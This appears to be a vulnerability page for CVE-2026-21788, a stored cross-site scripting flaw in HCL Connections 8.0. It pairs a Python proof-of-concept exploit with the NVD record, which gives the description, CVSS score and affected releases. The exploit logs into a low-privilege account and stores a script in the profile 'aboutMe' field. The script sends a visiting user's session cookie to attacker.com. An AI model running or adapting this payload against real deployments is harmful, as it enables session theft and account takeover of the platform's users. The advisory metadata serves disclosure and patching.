CVE-2026-21788

import requests import argparse # CVE-2026-21788 PoC - Stored XSS in HCL Connections # Target: HCL Connections # Vulnerability: Cross-Site Scripting (XSS) def exploit_xss(target_url, username, password): """ Exploit stored XSS vulnerability in HCL Connections This PoC demonstrates how to inject malicious JavaScript """ login_url = f"{target_url}/login" # Malicious XSS payload xss_payload = '<script>document.location="http://attacker.com/steal?cookie="+document.cookie</script>' # Step 1: Authenticate with low-privilege account session = requests.Session() login_data = { 'username': username, 'password': password } response = session.post(login_url, data=login_data) if response.status_code == 200: # Step 2: Inject XSS payload in profile or configuration field inject_url = f"{target_url}/profiles/profileEdit" inject_data = { 'aboutMe': xss_payload, # Injecting into aboutMe field 'submit': 'save' } inject_response = session.post(inject_url, data=inject_data) if inject_response.status_code == 200: print("[+] XSS payload injected successfully") print(f"[+] Payload stored in: {inject_url}") print("[+] When victim visits the page, cookie will be stolen") else: print("[-] Authentication failed") if __name__ == "__main__": parser = argparse.ArgumentParser(description='CVE-2026-21788 PoC') parser.add_argument('--url', required=True, help='Target HCL Connections URL') parser.add_argument('--user', required=True, help='Username') parser.add_argument('--pass', required=True, help='Password') args = parser.parse_args() exploit_xss(args.url, args.user, args.pass)

{"cve": {"id": "CVE-2026-21788", "sourceIdentifier": "[email protected]", "published": "2026-03-19T09:16:16.950", "lastModified": "2026-03-19T18:42:41.013", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HCL Connections is vulnerable to a cross-site scripting attack where an attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user which leads to executing malicious script code.  This may allow the attacker steal cookie-based authentication credentials and comprise user's account then launch other attacks."}, {"lang": "es", "value": "HCL Connections es vulnerable a un ataque de cross-site scripting donde un atacante puede aprovechar este problema para ejecutar código de script arbitrario en el navegador de un usuario desprevenido, lo que lleva a la ejecución de código de script malicioso. Esto puede permitir al atacante robar credenciales de autenticación basadas en cookies y comprometer la cuenta del usuario para luego lanzar otros ataques."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:connections:8.0:-:*:*:*:*:*:*", "matchCriteriaId": "65CA8438-B6A6-4B36-826D-8625AACBC8FE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:connections:8.0:cumulative_release1:*:*:*:*:*:*", "matchCriteriaId": "BF707A30-B342-43F2-A390-60E8FA8384D5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:connections:8.0:cumulative_release10:*:*:*:*:*:*", "matchCriteriaId": "718ED7EC-3899-448D-B661-39463F5F71D2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:connections:8.0:cumulative_release11:*:*:*:*:*:*", "matchCriteriaId": "FFA414A1-C353-427F-B4EC-ED5BFC13EAF9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:connections:8.0:cumulative_release12:*:*:*:*:*:*", "matchCriteriaId": "5A5A7E4B-9BDE-432E-8FAB-7CD8F1A2A81A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:connections:8.0:cumulative_release2:*:*:*:*:*:*", "matchCriteriaId": "294AE19B-3678-49C3-8613-A9331C5C1481"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:connections:8.0:cumulative_release3:*:*:*:*:*:*", "matchCriteriaId": "773D1288-DF28-43F3-9517-B176DD840A8C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:connections:8.0:cumulative_release4:*:*:*:*:*:*", "matchCriteriaId": "7FCB8E35-3FFA-42FA-8AEB-A2DD22D809C9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:connections:8.0:cumulative_release5:*:*:*:*:*:*", "matchCriteriaId": "8948C358-B168-45E3-BC9F-E5DA4DD56203"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:connections:8.0:cumulative_release6:*:*:*:*:*:*", "matchCriteriaId": "C6879F00-1C87-44A6-83DF-A1DC80A85A88"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:connections:8.0:cumulative_release7:*:*:*:*:*:*", "matchCriteriaId": "28450E88-8377-4B0D-9383-B34C9EF28CC9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:connections:8.0:cumulative_release8:*:*:*:*:*:*", "matchCriteriaId": "13C3274C-0784-4C88-9A2D-D7AAE3D9FC2E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:connections:8.0:cumulative_release9:*:*:*:*:*:*", "matchCriteriaId": "F3848284-F133-4B35-AC04-9E4FFB17EDF8"}]}]}], "references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0129107", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}